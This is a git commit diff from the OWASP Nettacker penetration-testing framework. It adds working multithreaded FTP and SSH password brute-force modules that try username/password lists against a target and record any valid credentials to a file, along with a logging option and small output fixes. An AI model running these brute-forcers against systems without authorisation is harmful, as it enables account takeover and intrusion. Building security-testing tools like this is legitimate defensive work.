mirror of https://github.com/OWASP/Nettacker.git
add ftp,ssh bruteforcer + add log switch + fix some bugs
This commit is contained in:
Ali Razmjoo
parent
a2f0d739cd
commit
1df375e7ce
|
|
@ -11,4 +11,5 @@ tmp/subs_temp
|
|||
tmp/tmp_targets
|
||||
results.txt
|
||||
user.txt
|
||||
pass.txt
|
||||
pass.txt
|
||||
logs.txt
|
||||
|
|
@ -5,6 +5,10 @@ from core import color
|
|||
|
||||
|
||||
def info(content):
|
||||
if '-L' in sys.argv or '--logs' in sys.argv:
|
||||
f=open('logs.txt','a')
|
||||
f.write('[+] ' + str(content) + '\n')
|
||||
f.close()
|
||||
if '\n' in content:
|
||||
num_newline = len(content) - len(content.rstrip("\n"))
|
||||
sys.stdout.write(color.color('yellow') + '[+] ' + color.color('green') +
|
||||
|
|
@ -16,11 +20,19 @@ def info(content):
|
|||
|
||||
|
||||
def write(content):
|
||||
if '-L' in sys.argv or '--logs' in sys.argv:
|
||||
f=open('logs.txt','a')
|
||||
f.write(str(content) + '\n')
|
||||
f.close()
|
||||
sys.stdout.write(content)
|
||||
return
|
||||
|
||||
|
||||
def warn(content):
|
||||
if '-L' in sys.argv or '--logs' in sys.argv:
|
||||
f=open('logs.txt','a')
|
||||
f.write('[!] ' + str(content) + '\n')
|
||||
f.close()
|
||||
if '\n' in content:
|
||||
num_newline = len(content) - len(content.rstrip("\n"))
|
||||
sys.stdout.write(color.color('blue') + '[!] ' + color.color('yellow') +
|
||||
|
|
@ -32,6 +44,10 @@ def warn(content):
|
|||
|
||||
|
||||
def error(content):
|
||||
if '-L' in sys.argv or '--logs' in sys.argv:
|
||||
f=open('logs.txt','a')
|
||||
f.write('[X] ' + str(content) + '\n')
|
||||
f.close()
|
||||
if '\n' in content:
|
||||
num_newline = len(content) - len(content.rstrip("\n"))
|
||||
sys.stdout.write(color.color('red') + '[X] ' + color.color('yellow') +
|
||||
|
|
|
|||
|
|
@ -7,11 +7,11 @@ from core.attack import start_attack
|
|||
from core.alert import *
|
||||
|
||||
def load():
|
||||
|
||||
write('\n\n')
|
||||
info('Nettacker engine started ...')
|
||||
|
||||
# module_names = ['smtp_brute', 'ftp_brute', 'rdp_brute', 'ssh_brute', 'http_brute', 'mysql_brute', 'mssql_brute']
|
||||
module_names = ['smtp_brute','port_scan']
|
||||
module_names = ['smtp_brute','port_scan','ftp_brute','ssh_brute']
|
||||
|
||||
parser = OptionParser(usage='python nettacker.py [options]', description='Nettacker Help Menu',
|
||||
epilog='Please read license and agreements https://github.com/Nettacker/Nettacker')
|
||||
|
|
@ -22,6 +22,8 @@ def load():
|
|||
help='find and scan subdomains')
|
||||
parser.add_option('-t', '--threads', action='store', default=5, type='int', dest='thread_number',
|
||||
help='thread numbers')
|
||||
parser.add_option('-L', '--logs', action='store_true', default=False, dest='log_in_file',
|
||||
help='save all logs in file (logs.txt)')
|
||||
|
||||
# Target Options
|
||||
target = OptionGroup(parser, "Target", "Target input options")
|
||||
|
|
@ -136,4 +138,5 @@ def load():
|
|||
n+=1
|
||||
start_attack(target.rsplit()[0],n,total_targets,scan_method,users,passwds,timeout_sec,thread_number,ports)
|
||||
write('\n')
|
||||
info('done!')
|
||||
info('done!')
|
||||
write('\n\n')
|
||||
|
|
@ -0,0 +1,2 @@
|
|||
#!/usr/bin/env python
|
||||
pass
|
||||
|
|
@ -0,0 +1,91 @@
|
|||
#!/usr/bin/env python
|
||||
import threading
|
||||
import time
|
||||
import ftplib
|
||||
from core.alert import *
|
||||
from ftplib import FTP
|
||||
|
||||
def login(user, passwd,target,port,timeout_sec):
|
||||
exit = 0
|
||||
while 1:
|
||||
try:
|
||||
my_ftp = FTP(timeout=timeout_sec)
|
||||
my_ftp.connect(target, port)
|
||||
exit = 0
|
||||
break
|
||||
except:
|
||||
exit += 1
|
||||
if exit is 10:
|
||||
warn('ftp connection to %s:%s timeout, skipping %s:%s'%(target,port,user,passwd))
|
||||
return 1
|
||||
time.sleep(0.1)
|
||||
flag = 1
|
||||
try:
|
||||
my_ftp.login(user, passwd)
|
||||
flag = 0
|
||||
except:
|
||||
pass
|
||||
if flag is 0:
|
||||
info('user:' + user + ' pass:' + passwd + ' server:' + target + ' port:' + str(port) + ' found!')
|
||||
save = open('results.txt', 'a')
|
||||
save.write('ftp ---> ' + user + ':' + passwd + ' ---> ' + target + ':' + str(port) + '\n')
|
||||
save.close()
|
||||
else:
|
||||
pass
|
||||
return flag
|
||||
|
||||
def start(target,users,passwds,ports,timeout_sec,thread_number,num,total): # Main function
|
||||
threads = []
|
||||
max = thread_number
|
||||
total_req = len(users) * len(passwds)
|
||||
for port in ports:
|
||||
# test ftp
|
||||
trying = 0
|
||||
portflag = True
|
||||
exit = 0
|
||||
while 1:
|
||||
try:
|
||||
my_ftp = FTP(timeout=timeout_sec)
|
||||
my_ftp.connect(target, port)
|
||||
exit = 0
|
||||
break
|
||||
except:
|
||||
exit += 1
|
||||
if exit is 3:
|
||||
error(
|
||||
'ftp connection to %s:%s failed, skipping whole step [process %s of %s]! going to next step' % (
|
||||
target, port, str(num), str(total)))
|
||||
portflag = False
|
||||
break
|
||||
time.sleep(0.1)
|
||||
|
||||
if portflag is True:
|
||||
for user in users:
|
||||
for passwd in passwds:
|
||||
t = threading.Thread(target=login, args=(user, passwd,target,port,timeout_sec))
|
||||
threads.append(t)
|
||||
t.start()
|
||||
trying += 1
|
||||
info('trying ' + str(trying) + ' of ' + str(total_req) + ' in process ' + str(num) + ' of ' + str(
|
||||
total) + ' ' + target + ':' + str(port))
|
||||
while 1:
|
||||
n = 0
|
||||
for thread in threads:
|
||||
if thread.isAlive() is True:
|
||||
n += 1
|
||||
else:
|
||||
threads.remove(thread)
|
||||
if n >= max:
|
||||
time.sleep(0.1)
|
||||
else:
|
||||
break
|
||||
|
||||
# wait for threads
|
||||
while 1:
|
||||
n = True
|
||||
for thread in threads:
|
||||
if thread.isAlive() is True:
|
||||
n = False
|
||||
time.sleep(0.1)
|
||||
if n is True:
|
||||
break
|
||||
|
|
@ -25,9 +25,9 @@ def login(user, passwd,target,port,timeout_sec):
|
|||
except smtplib.SMTPException, err:
|
||||
pass
|
||||
if flag is 0:
|
||||
info('user:' + user + ' pass:' + passwd + ' server:' + target + 'port:' + str(port) + ' found!')
|
||||
info('user:' + user + ' pass:' + passwd + ' server:' + target + ' port:' + str(port) + ' found!')
|
||||
save = open('results.txt', 'a')
|
||||
save.write(user + ':' + passwd + '\n')
|
||||
save.write('smtp ---> ' + user + ':' + passwd + ' ---> ' + target + ':' + str(port) + '\n')
|
||||
save.close()
|
||||
else:
|
||||
pass
|
||||
|
|
|
|||
|
|
@ -0,0 +1,2 @@
|
|||
#!/usr/bin/env python
|
||||
pass
|
||||
|
|
@ -0,0 +1,102 @@
|
|||
#!/usr/bin/env python
|
||||
import threading
|
||||
import time
|
||||
import paramiko
|
||||
from core.alert import *
|
||||
|
||||
|
||||
def login(user, passwd,target,port,timeout_sec):
|
||||
exit = 0
|
||||
flag = 1
|
||||
while 1:
|
||||
try:
|
||||
ssh = paramiko.SSHClient()
|
||||
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
|
||||
ssh.connect(target, username=user, password=passwd, timeout=timeout_sec)
|
||||
flag = 0
|
||||
exit = 0
|
||||
break
|
||||
except:
|
||||
exit += 1
|
||||
if exit is 10:
|
||||
warn('ssh connection to %s:%s timeout, skipping %s:%s'%(target,port,user,passwd))
|
||||
return 1
|
||||
time.sleep(0.1)
|
||||
|
||||
if flag is 0:
|
||||
info('user:' + user + ' pass:' + passwd + ' server:' + target + ' port:' + str(port) + ' found!')
|
||||
save = open('results.txt', 'a')
|
||||
save.write('ssh ---> ' + user + ':' + passwd + ' ---> ' + target + ':' + str(port) + '\n')
|
||||
save.close()
|
||||
else:
|
||||
pass
|
||||
return flag
|
||||
|
||||
def start(target,users,passwds,ports,timeout_sec,thread_number,num,total): # Main function
|
||||
threads = []
|
||||
max = thread_number
|
||||
total_req = len(users) * len(passwds)
|
||||
for port in ports:
|
||||
# test ssh
|
||||
trying = 0
|
||||
portflag = True
|
||||
exit = 0
|
||||
while 1:
|
||||
try:
|
||||
ssh = paramiko.SSHClient()
|
||||
ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy())
|
||||
ssh.connect(target, username='',password='',timeout=timeout_sec)
|
||||
exit = 0
|
||||
break
|
||||
except paramiko.ssh_exception.AuthenticationException, ssherr:
|
||||
if 'Authentication failed.' in ssherr:
|
||||
break
|
||||
else:
|
||||
exit += 1
|
||||
if exit is 3:
|
||||
error(
|
||||
'ssh connection to %s:%s failed, skipping whole step [process %s of %s]! going to next step' % (
|
||||
target, port, str(num), str(total)))
|
||||
portflag = False
|
||||
break
|
||||
time.sleep(0.1)
|
||||
except:
|
||||
exit += 1
|
||||
if exit is 3:
|
||||
error(
|
||||
'ssh connection to %s:%s failed, skipping whole step [process %s of %s]! going to next step' % (
|
||||
target, port, str(num), str(total)))
|
||||
portflag = False
|
||||
break
|
||||
time.sleep(0.1)
|
||||
|
||||
if portflag is True:
|
||||
for user in users:
|
||||
for passwd in passwds:
|
||||
t = threading.Thread(target=login, args=(user, passwd,target,port,timeout_sec))
|
||||
threads.append(t)
|
||||
t.start()
|
||||
trying += 1
|
||||
info('trying ' + str(trying) + ' of ' + str(total_req) + ' in process ' + str(num) + ' of ' + str(
|
||||
total) + ' ' + target + ':' + str(port))
|
||||
while 1:
|
||||
n = 0
|
||||
for thread in threads:
|
||||
if thread.isAlive() is True:
|
||||
n += 1
|
||||
else:
|
||||
threads.remove(thread)
|
||||
if n >= max:
|
||||
time.sleep(0.1)
|
||||
else:
|
||||
break
|
||||
|
||||
# wait for threads
|
||||
while 1:
|
||||
n = True
|
||||
for thread in threads:
|
||||
if thread.isAlive() is True:
|
||||
n = False
|
||||
time.sleep(0.1)
|
||||
if n is True:
|
||||
break
|
||||
|
|
@ -10,9 +10,10 @@ def connect(host, port,timeout_sec):
|
|||
s.settimeout(timeout_sec)
|
||||
s.connect((host, port))
|
||||
s.close()
|
||||
info('server:' + host + 'port:' + str(port) + ' found!')
|
||||
info('server:' + host + ' port:' + str(port) + ' found!')
|
||||
f = open('results.txt','a')
|
||||
f.write(host + ':' + str(port) + '\n')
|
||||
f.write('open port ---> ' + host + ':' + str(port) + '\n')
|
||||
f.close()
|
||||
return True
|
||||
except socket.error:
|
||||
return False
|
||||
|
|
|
|||
|
|
@ -1,3 +1,5 @@
|
|||
netaddr
|
||||
dnspython
|
||||
requests
|
||||
requests
|
||||
ftplib
|
||||
paramiko
|
||||
Loading…
Reference in New Issue